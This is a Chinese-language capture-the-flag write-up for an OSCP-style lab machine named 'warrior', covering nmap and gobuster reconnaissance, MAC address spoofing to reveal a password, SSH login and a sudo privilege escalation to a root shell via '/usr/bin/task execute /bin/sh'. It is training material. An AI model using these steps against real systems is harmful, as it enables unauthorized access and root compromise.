OSCP 靶场
靶场介绍
|
warrior |
easy |
信息收集、mac 地址修改、task 提权 |
信息收集
主机发现
端口扫描
└─# nmap -sV -A -p- -T4 192.168.31.70
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 03:13 EST
Nmap scan report for 192.168.31.70
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 25:16:8d:63:6b:75:f0:59:55:d4:b0:2d:75:8d:e0:e6 (RSA)
| 256 1e:29:d0:f4:c5:95:e7:40:30:2b:35:f7:a3:bc:36:75 (ECDSA)
|_ 256 cc:b1:52:b3:d7:ef:cd:73:4c:fc:f6:b5:51:77:ea:f3 (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 7 disallowed entries
| /admin /secret.txt /uploads/id_rsa /internal.php
|_/internal /cms /user.txt
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
MAC Address: 08:00:27:0C:35:AB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel目录扫描
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.70 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.70
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.70/index.html (Status: 200) [Size: 31]
http://192.168.31.70/user.txt (Status: 200) [Size: 5]
http://192.168.31.70/admin (Status: 301) [Size: 169] [--> http://192.168.31.70/admin/]
http://192.168.31.70/robots.txt (Status: 200) [Size: 137]
http://192.168.31.70/internal.php (Status: 200) [Size: 82]
http://192.168.31.70/secret.txt (Status: 200) [Size: 17]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
这里有个提示,需要修改mac 地址后才能看到密码
sudo ifconfig eth1 down
sudo ifconfig eth1 hw ether 00:00:00:00:00:af
sudo ifconfig eth1 up
sudo service networking restart
ifconfig修改后再次访问得到密码
权限获取
这里需要使用提示的bro 账号进行登录。
权限提升
利用task 提权到root 权限
/usr/sbin/sudo /usr/bin/task execute /bin/sh
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】warrior
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论